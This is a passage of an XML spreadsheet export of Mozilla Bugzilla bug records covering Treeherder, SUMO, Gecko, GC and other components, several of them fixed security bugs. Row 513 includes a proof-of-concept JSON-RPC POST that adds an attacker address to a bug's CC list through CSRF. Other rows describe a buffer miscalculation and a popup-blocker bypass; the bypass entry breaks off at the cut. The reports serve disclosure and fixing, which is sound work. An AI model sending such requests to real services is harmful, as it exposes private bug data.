          <t>+++ This bug was initially created as a clone of Bug #1644959 +++
Rule: https://phabricator.services.mozilla.com/H252
It looks like new group rules are created with `Take these actions the first time this rule matches`, and this gives the possibility to remove a group without automatically adding it back.
Please can we also do this for the preferences-reviewers group, so it can be removed without herald automatically adding it back.</t>
        </is>
      </c>
      <c r="X509" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="510">
      <c r="A510" t="n">
        <v>1060313</v>
      </c>
      <c r="B510" t="inlineStr">
        <is>
          <t>2014-08-29 04:15:03 -0700</t>
        </is>
      </c>
      <c r="C510" t="inlineStr">
        <is>
          <t>Repo menu links broken when testing ui locally with web-server.js</t>
        </is>
      </c>
      <c r="D510" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E510" t="n">
        <v>1</v>
      </c>
      <c r="F510" t="n">
        <v>1</v>
      </c>
      <c r="G510" t="n">
        <v>7</v>
      </c>
      <c r="H510" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I510" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J510" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K510" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L510" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M510" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N510" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O510" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P510" t="inlineStr"/>
      <c r="Q510" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R510" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S510" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T510" t="n">
        <v>1</v>
      </c>
      <c r="U510" t="n">
        <v>0</v>
      </c>
      <c r="V510" t="n">
        <v>9</v>
      </c>
      <c r="W510" t="inlineStr">
        <is>
          <t>1) Start web-server.js
2) Go to http://localhost:8000/app/index.html?tree=Try#/jobs
3) Open the repo menu
4) Left click on another repo's name (not the checkbox)
Expected:
Switch to that repo
Actual:
URL is incorrect, points to http://localhost:8000/app/#/jobs?repo=mozilla-inbound rather than http://localhost:8000/app/index.html#/jobs?repo=mozilla-inbound</t>
        </is>
      </c>
      <c r="X510" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="511">
      <c r="A511" t="n">
        <v>441714</v>
      </c>
      <c r="B511" t="inlineStr">
        <is>
          <t>2008-06-24 19:21:27 -0700</t>
        </is>
      </c>
      <c r="C511" t="inlineStr">
        <is>
          <t>Crash [@ JS_GetFunctionScript ] with setTimeout and XPCSafeJSObjectWrapper</t>
        </is>
      </c>
      <c r="D511" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E511" t="n">
        <v>1</v>
      </c>
      <c r="F511" t="n">
        <v>1</v>
      </c>
      <c r="G511" t="n">
        <v>3</v>
      </c>
      <c r="H511" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I511" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J511" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K511" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L511" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M511" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N511" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O511" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P511" t="inlineStr">
        <is>
          <t>[sg:investigate]</t>
        </is>
      </c>
      <c r="Q511" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R511" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S511" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T511" t="n">
        <v>1</v>
      </c>
      <c r="U511" t="n">
        <v>0</v>
      </c>
      <c r="V511" t="n">
        <v>23</v>
      </c>
      <c r="W511" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Based on the crash data, it looks like the calls to setTimeout are causing Firefox to crash.
Reproducible: Always
Steps to Reproduce:
1. Install Greasemonkey 0.8.20080609.0
2. Install script: http://taral.dreamhost.com/websudokuig.user.js
3. Visit http://www.websudoku.com/
4. Enable pencil marking in options
5. Hit the update button
Actual Results:  
Crash! http://crash-stats.mozilla.com/report/index/18026f7a-425b-11dd-b225-001cc45a2c28
Expected Results:  
Not crash</t>
        </is>
      </c>
      <c r="X511" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="512">
      <c r="A512" t="n">
        <v>729319</v>
      </c>
      <c r="B512" t="inlineStr">
        <is>
          <t>2012-02-21 14:33:39 -0800</t>
        </is>
      </c>
      <c r="C512" t="inlineStr">
        <is>
          <t>Hide threads that have no answers from /questions list after 90 days</t>
        </is>
      </c>
      <c r="D512" t="inlineStr">
        <is>
          <t>2012-03-27 14:38:10 -0700</t>
        </is>
      </c>
      <c r="E512" t="n">
        <v>1</v>
      </c>
      <c r="F512" t="n">
        <v>1</v>
      </c>
      <c r="G512" t="n">
        <v>5</v>
      </c>
      <c r="H512" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I512" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J512" t="inlineStr">
        <is>
          <t>Forum</t>
        </is>
      </c>
      <c r="K512" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L512" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M512" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N512" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O512" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P512" t="inlineStr">
        <is>
          <t>u=user c=questions p=2</t>
        </is>
      </c>
      <c r="Q512" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R512" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S512" t="inlineStr">
        <is>
          <t>2012.6</t>
        </is>
      </c>
      <c r="T512" t="n">
        <v>1</v>
      </c>
      <c r="U512" t="n">
        <v>0</v>
      </c>
      <c r="V512" t="n">
        <v>15</v>
      </c>
      <c r="W512" t="inlineStr">
        <is>
          <t>Threads with no answers should be removed from the view and search indexes 3 months after their creation.
After one month, we should add a "noindex" meta tag to make sure that is removed from Google on time.
The threads should be left in the DB for reference.</t>
        </is>
      </c>
      <c r="X512" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="513">
      <c r="A513" t="n">
        <v>718319</v>
      </c>
      <c r="B513" t="inlineStr">
        <is>
          <t>2012-01-15 11:34:15 -0800</t>
        </is>
      </c>
      <c r="C513" t="inlineStr">
        <is>
          <t>[SECURITY] JSON-RPC permits to bypass token checks and can lead to CSRF (no victim's action required)</t>
        </is>
      </c>
      <c r="D513" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:17 -0700</t>
        </is>
      </c>
      <c r="E513" t="n">
        <v>1</v>
      </c>
      <c r="F513" t="n">
        <v>1</v>
      </c>
      <c r="G513" t="n">
        <v>4</v>
      </c>
      <c r="H513" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I513" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J513" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K513" t="inlineStr">
        <is>
          <t>3.5.1</t>
        </is>
      </c>
      <c r="L513" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M513" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N513" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O513" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P513" t="inlineStr">
        <is>
          <t>[Bugzilla 3.4.x and older not affected][infrasec:csrf][ws:critical]</t>
        </is>
      </c>
      <c r="Q513" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R513" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S513" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T513" t="n">
        <v>1</v>
      </c>
      <c r="U513" t="n">
        <v>0</v>
      </c>
      <c r="V513" t="n">
        <v>53</v>
      </c>
      <c r="W513" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16
Steps to reproduce:
Hello,
No security token is used when a POST request is made in jsonrpc.cgi thus allowing an attacker to add as CC, to visit and bugs taken private, or restricted to certain users. To explore this it is necessary that a User with privileges to edit bugs, so the attacker creating a page specially crafted to add CC.
Reproduce:
Do a POST Request in https://bugzilla.mozilla.org/jsonrpc.cgi, whit this content:
{"version":"1.1","method":"Bug.update","id":2,"params":{"ids":[629221],"cc":{"add":["youremail@hack.com"]}}}
Cheers,
Mario</t>
        </is>
      </c>
      <c r="X513" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="514">
      <c r="A514" t="n">
        <v>12241</v>
      </c>
      <c r="B514" t="inlineStr">
        <is>
          <t>1999-08-20 14:59:58 -0700</t>
        </is>
      </c>
      <c r="C514" t="inlineStr">
        <is>
          <t>scrollto on nsIScrollableView does not work correctly</t>
        </is>
      </c>
      <c r="D514" t="inlineStr">
        <is>
          <t>2022-10-31 09:23:37 -0700</t>
        </is>
      </c>
      <c r="E514" t="n">
        <v>1</v>
      </c>
      <c r="F514" t="n">
        <v>1</v>
      </c>
      <c r="G514" t="n">
        <v>3</v>
      </c>
      <c r="H514" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I514" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J514" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K514" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L514" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M514" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N514" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O514" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P514" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q514" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R514" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S514" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T514" t="n">
        <v>1</v>
      </c>
      <c r="U514" t="n">
        <v>0</v>
      </c>
      <c r="V514" t="n">
        <v>11</v>
      </c>
      <c r="W514" t="inlineStr">
        <is>
          <t>When you call scrollto on nsIScrollableView the view does not scroll things
properly.
Turn on gfx scrollbars and scroll the window and you will see what I mean. I
left printf to tell you where I am scrolling to.
How to turn on gfx scrollbars:
mozilla/layout/html/style/src/nsCSSFrameConstructor.cpp
Problem shows up in both apprunner and viewer.
make the method IsGfxMode() return NS_TRUE;</t>
        </is>
      </c>
      <c r="X514" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="515">
      <c r="A515" t="n">
        <v>1256250</v>
      </c>
      <c r="B515" t="inlineStr">
        <is>
          <t>2016-03-14 03:35:55 -0700</t>
        </is>
      </c>
      <c r="C515" t="inlineStr">
        <is>
          <t>Implement the landing page of SensorWeb</t>
        </is>
      </c>
      <c r="D515" t="inlineStr">
        <is>
          <t>2016-04-18 21:01:58 -0700</t>
        </is>
      </c>
      <c r="E515" t="n">
        <v>1</v>
      </c>
      <c r="F515" t="n">
        <v>1</v>
      </c>
      <c r="G515" t="n">
        <v>6</v>
      </c>
      <c r="H515" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I515" t="inlineStr">
        <is>
          <t>Connected Devices Graveyard</t>
        </is>
      </c>
      <c r="J515" t="inlineStr">
        <is>
          <t>Project Sensor Web</t>
        </is>
      </c>
      <c r="K515" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L515" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M515" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N515" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O515" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P515" t="inlineStr">
        <is>
          <t>sensorweb-frontend</t>
        </is>
      </c>
      <c r="Q515" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R515" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S515" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T515" t="n">
        <v>1</v>
      </c>
      <c r="U515" t="n">
        <v>0</v>
      </c>
      <c r="V515" t="n">
        <v>6</v>
      </c>
      <c r="W515" t="inlineStr">
        <is>
          <t>Base on sensorweb-frontend[1], develop the landing page of SensorWeb. We would like to get feedback from users in the landing page.
[1]: https://github.com/evanxd/sensorweb-frontend</t>
        </is>
      </c>
      <c r="X515" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="516">
      <c r="A516" t="n">
        <v>1127246</v>
      </c>
      <c r="B516" t="inlineStr">
        <is>
          <t>2015-01-29 01:26:28 -0800</t>
        </is>
      </c>
      <c r="C516" t="inlineStr">
        <is>
          <t>baseShapes table is not updated after generational GC</t>
        </is>
      </c>
      <c r="D516" t="inlineStr">
        <is>
          <t>2016-06-04 16:12:56 -0700</t>
        </is>
      </c>
      <c r="E516" t="n">
        <v>1</v>
      </c>
      <c r="F516" t="n">
        <v>1</v>
      </c>
      <c r="G516" t="n">
        <v>3</v>
      </c>
      <c r="H516" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I516" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J516" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K516" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L516" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M516" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N516" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O516" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P516" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q516" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R516" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S516" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T516" t="n">
        <v>1</v>
      </c>
      <c r="U516" t="n">
        <v>0</v>
      </c>
      <c r="V516" t="n">
        <v>20</v>
      </c>
      <c r="W516" t="inlineStr">
        <is>
          <t>The baseShapes table is keyed based on parent and metadata objects pointers, both of which may be in the nursery.  It needs a postbarrier to rekey entries if these objects are moved on generational GC.
Forking this issue from bug 1124563.</t>
        </is>
      </c>
      <c r="X516" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="517">
      <c r="A517" t="n">
        <v>1404058</v>
      </c>
      <c r="B517" t="inlineStr">
        <is>
          <t>2017-09-28 11:56:05 -0700</t>
        </is>
      </c>
      <c r="C517" t="inlineStr">
        <is>
          <t>Fix XCUI tests after Photon UI work - Part 1</t>
        </is>
      </c>
      <c r="D517" t="inlineStr">
        <is>
          <t>2017-10-12 13:42:42 -0700</t>
        </is>
      </c>
      <c r="E517" t="n">
        <v>1</v>
      </c>
      <c r="F517" t="n">
        <v>1</v>
      </c>
      <c r="G517" t="n">
        <v>2</v>
      </c>
      <c r="H517" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I517" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J517" t="inlineStr">
        <is>
          <t>Build &amp; Test</t>
        </is>
      </c>
      <c r="K517" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L517" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M517" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N517" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O517" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P517" t="inlineStr"/>
      <c r="Q517" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R517" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S517" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T517" t="n">
        <v>1</v>
      </c>
      <c r="U517" t="n">
        <v>0</v>
      </c>
      <c r="V517" t="n">
        <v>3</v>
      </c>
      <c r="W517" t="inlineStr">
        <is>
          <t>Created attachment 8913360
UI work - Part 1</t>
        </is>
      </c>
      <c r="X517" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="518">
      <c r="A518" t="n">
        <v>1059361</v>
      </c>
      <c r="B518" t="inlineStr">
        <is>
          <t>2014-08-27 08:42:10 -0700</t>
        </is>
      </c>
      <c r="C518" t="inlineStr">
        <is>
          <t>Repo menu: A repo called 'unknown' is displayed</t>
        </is>
      </c>
      <c r="D518" t="inlineStr">
        <is>
          <t>2014-09-15 21:21:20 -0700</t>
        </is>
      </c>
      <c r="E518" t="n">
        <v>1</v>
      </c>
      <c r="F518" t="n">
        <v>1</v>
      </c>
      <c r="G518" t="n">
        <v>7</v>
      </c>
      <c r="H518" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I518" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J518" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K518" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N518" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O518" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P518" t="inlineStr"/>
      <c r="Q518" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R518" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S518" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T518" t="n">
        <v>1</v>
      </c>
      <c r="U518" t="n">
        <v>0</v>
      </c>
      <c r="V518" t="n">
        <v>4</v>
      </c>
      <c r="W518" t="inlineStr">
        <is>
          <t>eg:
https://treeherder.mozilla.org/ui/#/jobs?repo=unknown
What jobs are being given a repo of unknown?</t>
        </is>
      </c>
      <c r="X518" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="519">
      <c r="A519" t="n">
        <v>607160</v>
      </c>
      <c r="B519" t="inlineStr">
        <is>
          <t>2010-10-25 16:58:29 -0700</t>
        </is>
      </c>
      <c r="C519" t="inlineStr">
        <is>
          <t>Buffer size calculation failure when running an absurdly long and complex text run</t>
        </is>
      </c>
      <c r="D519" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:39 -0700</t>
        </is>
      </c>
      <c r="E519" t="n">
        <v>1</v>
      </c>
      <c r="F519" t="n">
        <v>1</v>
      </c>
      <c r="G519" t="n">
        <v>3</v>
      </c>
      <c r="H519" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I519" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J519" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K519" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L519" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M519" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N519" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O519" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P519" t="inlineStr">
        <is>
          <t>[sg:critical] [qa-ntd-191] [qa-ntd-192]</t>
        </is>
      </c>
      <c r="Q519" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R519" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S519" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T519" t="n">
        <v>1</v>
      </c>
      <c r="U519" t="n">
        <v>0</v>
      </c>
      <c r="V519" t="n">
        <v>35</v>
      </c>
      <c r="W519" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
When creating a 2684354575-character long text run, containing many complex unicode characters and its font-weight property is 65537, inside a &lt;div&gt; that is 3px wide, the buffer size for a text run is incorrectly calculated. In my tests, I found that the program exits safely, but an attacker could leverage an incorrectly calculated buffer size to run arbitrary code.
Reproducible: Always
Steps to Reproduce:
1. View the testcase.
Actual Results:  
A sustained period of hanging, followed by a "Microsoft C++ Runtime" exception.
Expected Results:  
It should have just been a DOS.
This was only tested against Windows 7 Home Edition. View the attached stack trace for proof of an incorrectly calculated buffer.</t>
        </is>
      </c>
      <c r="X519" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="520">
      <c r="A520" t="n">
        <v>1137326</v>
      </c>
      <c r="B520" t="inlineStr">
        <is>
          <t>2015-02-26 09:52:59 -0800</t>
        </is>
      </c>
      <c r="C520" t="inlineStr">
        <is>
          <t>Avoid compartment iterator invalidation</t>
        </is>
      </c>
      <c r="D520" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:49 -0700</t>
        </is>
      </c>
      <c r="E520" t="n">
        <v>1</v>
      </c>
      <c r="F520" t="n">
        <v>1</v>
      </c>
      <c r="G520" t="n">
        <v>3</v>
      </c>
      <c r="H520" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I520" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J520" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K520" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L520" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M520" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N520" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O520" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P520" t="inlineStr">
        <is>
          <t>[adv-main37+][adv-esr31.6+]</t>
        </is>
      </c>
      <c r="Q520" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R520" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S520" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T520" t="n">
        <v>1</v>
      </c>
      <c r="U520" t="n">
        <v>0</v>
      </c>
      <c r="V520" t="n">
        <v>13</v>
      </c>
      <c r="W520" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1120655 +++
Separate bug for the patch "Fix out of bounds error in JS_iterateCompartments" from bug 1120655 so that it can land before the other parts.</t>
        </is>
      </c>
      <c r="X520" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="521">
      <c r="A521" t="n">
        <v>15617</v>
      </c>
      <c r="B521" t="inlineStr">
        <is>
          <t>1999-10-05 14:38:28 -0700</t>
        </is>
      </c>
      <c r="C521" t="inlineStr">
        <is>
          <t>Regression: 10-05-12m11 migration won't write 5.0 prefs</t>
        </is>
      </c>
      <c r="D521" t="inlineStr">
        <is>
          <t>2008-07-31 01:24:37 -0700</t>
        </is>
      </c>
      <c r="E521" t="n">
        <v>1</v>
      </c>
      <c r="F521" t="n">
        <v>1</v>
      </c>
      <c r="G521" t="n">
        <v>3</v>
      </c>
      <c r="H521" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I521" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J521" t="inlineStr">
        <is>
          <t>Profile Migration</t>
        </is>
      </c>
      <c r="K521" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L521" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M521" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N521" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O521" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P521" t="inlineStr"/>
      <c r="Q521" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R521" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S521" t="inlineStr">
        <is>
          <t>M10</t>
        </is>
      </c>
      <c r="T521" t="n">
        <v>1</v>
      </c>
      <c r="U521" t="n">
        <v>0</v>
      </c>
      <c r="V521" t="n">
        <v>20</v>
      </c>
      <c r="W521" t="inlineStr">
        <is>
          <t>Using 1999100512m11 commercial build NT 4.0
After migrating a profile (and using messenger, accessing mail, then quitting),
you're left with just the 4.x prefs in the prefs.js file. No seamonkey prefs are
written/saved.
1.  Migrate a 4.x POP or IMAP profile.
2.  Go to Messenger. Server folders are present.
3.  Exit the application.
4.  Check the prefs.js file in the profile's mail directory for seamonkey.
Result:  the prefs are in 4.x format, no 5.0 prefs translations appear. There
are no prefs to indicate identity numbers. The entire prefs.js is written with
"generic" 4.x prefs based on a single identity.
Logged this as a blocker, because I can't test mailnews pref migration until
fixed.</t>
        </is>
      </c>
      <c r="X521" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="522">
      <c r="A522" t="n">
        <v>982909</v>
      </c>
      <c r="B522" t="inlineStr">
        <is>
          <t>2014-03-12 16:04:17 -0700</t>
        </is>
      </c>
      <c r="C522" t="inlineStr">
        <is>
          <t>popup blocker bypass (ZDI-CAN-2215)</t>
        </is>
      </c>
      <c r="D522" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E522" t="n">
        <v>1</v>
      </c>
      <c r="F522" t="n">
        <v>1</v>
      </c>
      <c r="G522" t="n">
        <v>3</v>
      </c>
      <c r="H522" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I522" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J522" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K522" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L522" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M522" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N522" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O522" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P522" t="inlineStr">
        <is>
          <t>[pwn2own 2014][adv-main28+]</t>
        </is>
      </c>
      <c r="Q522" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R522" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S522" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T522" t="n">
        <v>1</v>
      </c>
      <c r="U522" t="n">
        <v>0</v>
      </c>
      <c r="V522" t="n">
        <v>30</v>
      </c>
      <c r="W522" t="inlineStr">
        <is>
          <t>------------------------
2. POP-UP BLOCKER BYPASS
------------------------
Even after frame navigation, the unloaded window can still execute scripts, provided that the parent window holds a reference to a method such as |eval|. Obviously, it's limited in what it can do, for example all methods that forward operation from the inner window (Window per W3C) to the outer window (WindowProxy per W3C) will raise an exception:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; nsGlobalWindow.cpp &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
